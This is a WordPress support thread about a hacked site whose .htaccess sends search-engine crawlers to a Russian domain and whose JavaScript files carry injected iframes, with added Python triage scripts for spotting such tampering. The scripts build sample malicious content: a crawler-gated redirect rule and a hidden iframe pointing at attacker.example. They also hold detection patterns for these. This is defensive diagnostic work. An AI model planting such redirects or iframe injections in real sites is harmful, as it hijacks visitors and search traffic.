
SITE HACKED: redirect to sociallytouch.ru (4 posts)

  1. senra
    Member
    Posted 1 year ago #

    Hi,

    I am facing a peculiar problem for the past one week. I am using the Mantra Theme for one of my customer's sites. Last week, I found the site was hacked, and the .htaccess file was modified to redirect all Google bots to a Russian site, e.g. sociallytouch.ru.

    I deleted the whole existing installation, but kept the same DB. I uploaded fresh files of WordPress and the Mantra Theme, and still the site is redirected to the Russian site.

    I could have just re-installed. But I wanted to find out why it was happening, and thus started debugging. From Live HTTP Headers and Firebug, I could observe the following.

    1. The redirect happens the moment the custom header is accessed; a 303 redirect is happening.

    2. I tried accessing the custom header file path, and the site is redirecting. For other files, it's NOT redirecting.

    3. I disabled JavaScript and then accessed it, and the same thing is happening.

    4. I tried searching for the term ".ru" in the options table and in the posts table, but I could find no records in either table. But still, from somewhere, WordPress is redirecting to sociallytouch.ru.

    Can anyone guess why it's happening? I searched the net for help, but I could find only the link below specific to this issue.

    http://labs.sucuri.net/?details=sociallytouch.ru

    Update:
    -------

    I forgot to mention that there is an iframe injection in all my JavaScript files..
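    The two indicators senra describes (a bot-gated redirect in .htaccess and iframe markup inside every .js file) can be located mechanically. The script below is an added triage example, not code from senra, WordPress or the Mantra Theme; it builds a throw-away directory that reproduces both symptoms with constructed data (example.net stands in for the site's own host, attacker.example for the redirect destination) and then scans it.

```python
"""Added triage helper for the two symptoms described in this thread:
a modified .htaccess that redirects only search-engine crawlers off-site,
and <iframe> markup injected into every .js file.  Not WordPress code;
the sample tree it scans is constructed below for the demonstration."""
import os
import re
import tempfile
from urllib.parse import urlparse

# RewriteCond lines that single out crawlers by User-Agent.  A redirect gated
# this way is invisible to the owner's browser, which is why the site "looks
# fine" while Google sees the .ru destination.
BOT_COND = re.compile(
    r"RewriteCond\s+%\{HTTP_USER_AGENT\}.*?(bot|crawl|spider|slurp|google|bing|yandex)",
    re.IGNORECASE)
REWRITE_RULE = re.compile(r"RewriteRule\s+\S+\s+(\S+)", re.IGNORECASE)
IFRAME = re.compile(r"<iframe[^>]*>", re.IGNORECASE)
# Injected frames are usually made invisible so the victim page looks unchanged.
HIDDEN = re.compile(
    r"(width|height)\s*=\s*['\"]?0\b|display\s*:\s*none|visibility\s*:\s*hidden",
    re.IGNORECASE)


def find_suspicious_rewrites(htaccess_text, own_hosts):
    """Return (line_no, target, bot_gated) for every RewriteRule whose target
    is an absolute URL on a host outside own_hosts.  bot_gated is True when a
    crawler User-Agent condition precedes the rule."""
    findings = []
    bot_gated = False
    for no, raw in enumerate(htaccess_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line.lower().startswith("rewritecond"):
            bot_gated = bot_gated or bool(BOT_COND.search(line))
            continue
        m = REWRITE_RULE.match(line)
        if m:
            host = urlparse(m.group(1)).hostname
            if host and host not in own_hosts:
                findings.append((no, m.group(1), bot_gated))
            bot_gated = False  # RewriteCond lines apply only to the next rule
    return findings


def find_injected_iframes(js_text):
    """Return (tag, hidden) for every <iframe> tag found inside a .js file;
    legitimate library code rarely carries literal iframe markup at all."""
    return [(m.group(0), bool(HIDDEN.search(m.group(0))))
            for m in IFRAME.finditer(js_text)]


def scan_tree(root, own_hosts):
    """Walk an installation; map relative path -> findings for files that hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                text = fh.read()
            if name == ".htaccess":
                hits = find_suspicious_rewrites(text, own_hosts)
            elif name.endswith(".js"):
                hits = find_injected_iframes(text)
            else:
                continue
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


def build_demo_site():
    """Construct a throw-away tree reproducing the symptoms (constructed data;
    example.net stands in for the site's own host, attacker.example for the
    redirect destination)."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    js_dir = os.path.join(root, "wp-includes", "js")
    os.makedirs(js_dir)
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\n"
                 "RewriteCond %{HTTP_HOST} ^example\\.net$ [NC]\n"
                 "RewriteRule ^(.*)$ http://www.example.net/$1 [R=301,L]\n"   # benign
                 "RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|slurp) [NC]\n"
                 "RewriteRule .* http://attacker.example/ [R=301,L]\n")      # injected
    with open(os.path.join(js_dir, "jquery.js"), "w") as fh:
        fh.write("/* genuine code */ var x = 1;\n"
                 "document.write('<iframe src=\"http://attacker.example/x.php\" "
                 "width=\"0\" height=\"0\" style=\"display:none\"></iframe>');\n")
    with open(os.path.join(js_dir, "clean.js"), "w") as fh:
        fh.write("function ok() { return 1; }\n")
    return root


if __name__ == "__main__":
    for path, hits in scan_tree(build_demo_site(), {"example.net", "www.example.net"}).items():
        print(path, hits)
```

    Run it against a real document root instead of the demo tree by passing that directory and the site's own hostnames to scan_tree; the benign canonical-host redirect is deliberately included so the own_hosts allow-list shows why plain "any RewriteRule with an http:// target" would be too noisy.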

  2. Andrew
    Forum Moderator
    Posted 1 year ago #

  3. senra
    Member
    Posted 1 year ago #

    Thanks Andrew.. I had gone through those links, and took preventive measures..

    Now I want to locate exactly where this hack happened..

    I am providing a copy of the Live HTTP Headers output below..

    http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header

    GET /wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header HTTP/1.1
    Host: www.girilaljainarchive.net
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Cookie:

    HTTP/1.1 200 OK
    Date: Sun, 11 Nov 2012 11:40:56 GMT
    Server: Apache
    Vary: Accept-Encoding
    Content-Encoding: gzip
    Content-Length: 592
    Keep-Alive: timeout=10, max=30
    Connection: Keep-Alive
    Content-Type: text/html; charset=UTF-8
    ----------------------------------------------------------
    http://www.girilaljainarchive.net/wp-admin/css/install.css?ver=3.4.2

    GET /wp-admin/css/install.css?ver=3.4.2 HTTP/1.1
    Host: www.girilaljainarchive.net
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: text/css,*/*;q=0.1
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header
    Cookie: Cache-Control: max-age=0

    HTTP/1.1 301 Moved Permanently
    Date: Sun, 11 Nov 2012 11:40:57 GMT
    Server: Apache
    Location: Really, don't post that
    Content-Length: 329
    Keep-Alive: timeout=10, max=29
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    ----------------------------------------------------------
    http://www.girilaljainarchive.net/wp-admin/images/wordpress-logo.png?ver=20120216

    GET /wp-admin/images/wordpress-logo.png?ver=20120216 HTTP/1.1
    Host: www.girilaljainarchive.net
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0
    Accept: image/png,image/*;q=0.8,*/*;q=0.5
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: keep-alive
    Referer: http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header
    Cookie:
    Cache-Control: max-age=0

    HTTP/1.1 301 Moved Permanently
    Date: Sun, 11 Nov 2012 11:40:57 GMT
    Server: Apache
    Location: Redacted
    Content-Length: 329
    Keep-Alive: timeout=10, max=30
    Connection: Keep-Alive
    Content-Type: text/html; charset=iso-8859-1
    ----------------------------------------------------------
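    The trace above already narrows the search: the PHP page (upgrade.php) returns 200, while the plain .css and .png files next to it get a 301 from Apache. With WordPress' stock rewrite rules, a request for a file that exists on disk is served by the web server and never reaches PHP, so an off-site 3xx on those files points at the .htaccess or virtual-host layer rather than the theme or database. The script below is an added example, not senra's capture or any WordPress or browser-extension code: it parses a Live HTTP Headers style dump and flags exactly that pattern. The embedded capture is constructed to mirror the thread's trace, with example.net for the site and attacker.example where the forum redacted the Location header.

```python
"""Added helper that reads a Live HTTP Headers style capture and flags
exchanges where a static asset is answered with a 3xx pointing off-site.
Not WordPress or browser-extension code; the capture below is constructed
to mirror the thread's trace, with example.net for the site and
attacker.example where the forum redacted the Location header."""
import re
from urllib.parse import urlparse

STATIC_EXT = (".css", ".js", ".png", ".jpg", ".gif", ".ico")
REQUEST = re.compile(r"^(GET|POST|HEAD)\s+(\S+)\s+HTTP/\d\.\d$")
STATUS = re.compile(r"^HTTP/\d\.\d\s+(\d{3})\b")
SEPARATOR = re.compile(r"^-{10,}\s*$", re.MULTILINE)

# Constructed capture in the same layout as the one pasted in the thread.
CAPTURE = """\
http://www.example.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header

GET /wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header HTTP/1.1
Host: www.example.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html; charset=UTF-8
----------------------------------------------------------
http://www.example.net/wp-admin/css/install.css?ver=3.4.2

GET /wp-admin/css/install.css?ver=3.4.2 HTTP/1.1
Host: www.example.net
Referer: http://www.example.net/wp-admin/upgrade.php

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://attacker.example/
Content-Type: text/html; charset=iso-8859-1
----------------------------------------------------------
http://www.example.net/wp-admin/images/wordpress-logo.png?ver=20120216

GET /wp-admin/images/wordpress-logo.png?ver=20120216 HTTP/1.1
Host: www.example.net

HTTP/1.1 301 Moved Permanently
Server: Apache
Location: http://attacker.example/
Content-Type: text/html; charset=iso-8859-1
----------------------------------------------------------
"""


def parse_capture(text):
    """Split the capture on its dashed separators and pull out, per exchange,
    the request path, Host, response status and Location."""
    exchanges = []
    for chunk in SEPARATOR.split(text):
        ex = {"host": None, "path": None, "status": None, "location": None}
        for line in chunk.splitlines():
            line = line.strip()
            m = REQUEST.match(line)
            if m:
                ex["path"] = m.group(2)
                continue
            m = STATUS.match(line)
            if m:
                ex["status"] = int(m.group(1))
                continue
            name, _, value = line.partition(":")
            if name.lower() == "host":
                ex["host"] = value.strip()
            elif name.lower() == "location":
                ex["location"] = value.strip()
        if ex["path"]:
            exchanges.append(ex)
    return exchanges


def offsite_static_redirects(exchanges):
    """With WordPress' stock rewrite rules an existing static file is served by
    Apache directly and never reaches PHP, so a 3xx on .css/.png/.js with a
    foreign Location implicates the web-server layer (.htaccess or vhost
    config), not a theme or plugin.  Returns (path, status, destination_host)."""
    hits = []
    for ex in exchanges:
        bare_path = ex["path"].split("?", 1)[0].lower()
        if not bare_path.endswith(STATIC_EXT):
            continue
        if ex["status"] and 300 <= ex["status"] < 400 and ex["location"]:
            dest = urlparse(ex["location"]).hostname
            if dest and dest != ex["host"]:
                hits.append((ex["path"], ex["status"], dest))
    return hits


if __name__ == "__main__":
    for hit in offsite_static_redirects(parse_capture(CAPTURE)):
        print("off-site redirect on static asset:", hit)
```

    Feed a real capture into parse_capture and, if static assets show up in the result, compare the server's .htaccess files and virtual-host configuration against a known-good copy before spending time on the theme, plugins or wp_options.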
  4. @senra? You're hacked, you really don't need to post that here. We get it.

    I'm sorry but there are no shortcuts to getting out of this. You or someone needs to delouse that installation. It's a lot of work ahead of you.

    Re-iterating what Andrew already posted:

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

Topic Closed

This topic has been closed to new replies.
